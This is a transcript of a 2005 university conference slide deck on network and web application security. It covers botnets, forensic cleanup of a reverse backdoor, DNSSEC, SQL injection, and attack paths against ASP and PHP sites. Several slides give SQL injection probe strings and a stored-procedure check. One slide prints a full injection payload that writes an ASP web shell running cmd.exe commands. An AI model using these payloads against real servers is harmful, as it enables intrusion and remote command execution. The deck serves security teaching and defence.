1 / 50

WISE 2005 Conference

WISE 2005 Conference. Presented by Erion Lin, Department of Information Management, National Taiwan University. Outline. Introduction Network Security Botnet Forensic Analysis of Reverse Backdoor DNSSEC Net Gap Program Security SQL Injection Security Problems of ASP

xena
Download Presentation

WISE 2005 Conference

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. WISE 2005 Conference Presented by Erion Lin, Department of Information Management, National Taiwan University

  2. Outline • Introduction • Network Security • Botnet • Forensic Analysis of Reverse Backdoor • DNSSEC • Net Gap • Program Security • SQL Injection • Security Problems of ASP • Security Problems of PHP • Some Hack Skills • Conclusion

  3. Introduction

  4. Introduction • 2004年爆發多起資訊安全事件 • 中國大陸駭客入侵總統府網站 • 大陸網軍對我數位社會的威脅 • 健保、車籍資料外洩數百萬筆 • 網路犯罪案件數的大幅度成長

  5. 網路犯罪案件數的大幅度成長

  6. Introduction (Cont’d) • 2004年10月21日,行政院頒布「各政府機關(構)落實資安事件危機處理具體執行方案,要求「各政府機關(構)對極重要、重要之敏感文件、資料、檔案等之處理,應採取檔案加密方式儲存,並除非常必要之連網外,均兼採實體隔離等防護措施,以防止被侵入破壞、竄改、刪除或未經授權之存取動作」。

  7. Network Security

  8. Botnet Zombie3 Zombie2 Zombie4 Zombie1 Zombie5 Internet Horn Attack Hacker

  9. rabbi.bi-apple.net Bi-apple Backdoor─Initial State rabbi.bi-apple.net 127.0.0.1 Victim Target Server Zombie3 Zombie2 Zombie1 Intranet Internet Firewall Bi-apple DNS Server Router DMZ DNS Server Hacker

  10. rabbi.bi-apple.net rabbi.bi-apple.net 61.221.104.181 Backdoor Active State 61.221.104.181 rabbi.bi-apple.net 61.221.104.181 Victim Target Server Zombie3 Zombie2 Zombie1 Intranet Internet Firewall Bi-apple DNS Server Router DMZ DNS Server Hacker

  11. Attack Remote Control Syn from Victim 61.221.104.181:80 Remote Control Backdoor Active State(Cont’d) rabbi.bi-apple.net 61.221.104.181 61.221.104.181 Victim Target Server Zombie3 Zombie2 Zombie1 Intranet Internet Firewall Bi-apple DNS Server Router DMZ DNS Server Hacker

  12. Feature of Bi-Apple Backdoor • Hard to Detect • Reverse Backdoor • Easy to Change the Zombie

  13. Digital Forensic Environment

  14. Digital Forensic Analysis • On-Line Analysis • Off-Line Analysis

  15. On-Line Analysis • Emergency Recovery • Find Out the Reason

  16. On-Line Analysis Steps • Remove Process • Remove File and Registry • Reboot

  17. Step1:Check Process Explorer

  18. Step2:Check Autoruns

  19. Step2:Check Autoruns

  20. Step3:Check TCPView

  21. Step4:Check File

  22. Step4:Check File

  23. Step5:Check DLL

  24. Step6:Reboot

  25. Step7:Check Process Explorer

  26. Step8:Check Sniffer

  27. Step9:Stop Running Process • explorer.exe • IEXPLORE.exe

  28. Step10:Delete Malicious Registry • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B49DA3DF-E569-423d-BDEA-8F89128E8107} • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2E8A6CF6-3500-4A7D-9F54-69CD76D367D2}

  29. Step11:Reboot • Check System Activities Again • Check Network Activities Again

  30. Fake DNS Message DNS Message Accepted Accepted Normal DNS Internet Hacker DNS Administrator DNS Server

  31. Fake DNS Message DNS Message Accepted Rejected DNSSEC Internet Hacker DNS Administrator DNS Server with DNSSEC

  32. DNSSEC • TSIG • Secret Key • One-Way Hash Function • SIG0 • Public Key

  33. Malicious TCP/TP Packet Processing Packet Normal TCP/IP Packet Net Gap Internet Firewall Net Gap1 Router Net Gap2 Intranet

  34. Net Gap(Cont’d) • Net Gap1:Deconstruct Packets • Net Gap2:Reconstruct Packets

  35. Program Security

  36. SQL Injection • The attacker can execute arbitrary SQL queries AND/OR commands on the backend database server through the Web application.

  37. May Occur SQL Injection

  38. SQL Injection Detective Skill • Before • http://www.ox.com.tw/script.asp?id=2’ IE returns ODBC error record. • New Generation • http://www.ox.com.tw/script.asp?id=2 and 1=1IE returns normal record. • http://www.ox.com.tw/script.asp?id=2 and 1=2IE returns no record.

  39. Security Problems of ASP XP_CMDSHELL Recovery xp_cmdshell Others (mdb) (db2) (Informix) Upload Area Install Web Shell Add New Account MS SQL SQL Injection DB Detecting Echo script Echo exe file Firewall Outbound testing MySQL Directory traversal File Information Leak Oracle FTP TFTP 網芳 Configure File Default configure Install Backdoor Failure Success

  40. Hack Skills of ASP • ASP SQL Injection • MSSQL DB Detection Skill • MSSQL Store Procedure Skill • ASP WebShell Skill • Firewall Outbound Shell • One Way Hacking • Backdoor Skill

  41. Security Problems of PHP Password Breaking Program Others (mdb) (db2) (Informix) Password File Upload Area Load File Testing Account and Password MS SQL System Configuration File Homepage Source Code Program Defection SQL Injection DB Detection Install Backdoor Save File Testing MySQL Directory traversal File Information Leak Install Web Shell Oracle Create Temp DB System Section Writable Web Section Writable Configure File Default configure Override MySQL Save Backdoor into DB Failure Success

  42. Hack Skills of PHP • Writable Directory Testing Skill • File Uploading DB Skill • Temp Table Design Dkill • PHP WebShell Skill • Password Breaking Skill • Unix Backdoor Skill

  43. MSSQL DB Detection Skill And 1=(Select @@version) MSSQL 版本資訊

  44. MSSQL Store Procedure Skill • http://www.ox.com.tw/asp/test.asp?id=294 and 1=(SELECT count(*) FROMmaster.dbo.sysobjectsWHERE xtype = 'X‘AND name= 'xp_cmdshell') • 存在xp_cmdshell 的話 • 會顯示原有新聞資料 • 不存在xp_cmdshell 的話 • 會出現錯誤訊息或跳回首頁

  45. ASP WebShell Skill • exec sp_makewebtask @outputfile%3d‘c:\inetpub\wwwroot/a.asp',@charset%3dbig5,@query%3d'select ''<%25On Error Resume Next : Set oscript %3d Server.CreateObject("wscript.SHELL") : Set oscriptNet %3d Server.CreateObject("wscript.NETWORK") : Set oFileSys %3d Server.CreateObject("scripting.FileSystemObject") : szCMD %3d Request.Form(".CMD") : If (szCMD <>"")Then : szTempFile %3d "C:\" %26 oFileSys.GetTempName() : Call oscript.Run ("cmd.exe /c " %26 szCMD %26 " > " %26 szTempFile, 0, True) : Set oFile %3d oFilesys.OpenTextFile (szTempFile, 1, False, 0) End If %25> <HTML><BODY><FORM action%3d"<%25%3d Request.ServerVariables("URL")%25>" method%3d"POST"> <input type%3dtext name%3d".CMD" size%3d45 value%3d"<%25%3d szCMD %25>"><input type%3dsubmit value%3d"Run"> </FORM><PRE> <%25 If (IsObject(oFile))Then : On Error Resume Next : Response.Write Server.HTMLEncode(oFile.ReadAll) : oFile.Close : Call oFileSys.DeleteFile(szTempFile, True) : End If%25> </BODY></HTML> '‘ '

  46. Backdoor Skills • 重用連接埠技術 • 典型代表後門: 駭客之門 • 它只有一個dll檔案,通過感染系統檔案啟動自身,被感染的系統檔案大小和日期都不會改變;. 同時採用線程插入技術,本身沒有進程;它本身不開連接埠,而是重用系統進程開的任意一個連接埠,如80,135,139,445等

  47. Reuse Port Skill Firewall(外對內開21,80, 內對外全設限) 2 Web FTP IE 3 ftp BD 1

  48. Conclusion

  49. Conclusion • Software Security Quality • Identify all data of user input. • Handle meta-character carefully. • Don’t give too much error message to user. • Try to understand the characteristic of programming language. • Avoid using APIs that will call shell directly. • Check all application’s default setting • New Version of BS7799 • Different vendors. • Information Security Education • Management, Information and System

  50. Thanks for Your Listening

More Related